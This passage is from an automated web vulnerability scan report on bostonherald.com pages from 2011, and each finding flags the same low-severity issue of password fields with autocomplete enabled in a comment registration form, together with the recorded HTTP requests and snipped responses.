Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.149. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.150. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.151. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.152. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.153. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.154. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.155. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.156. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.157. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.158. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

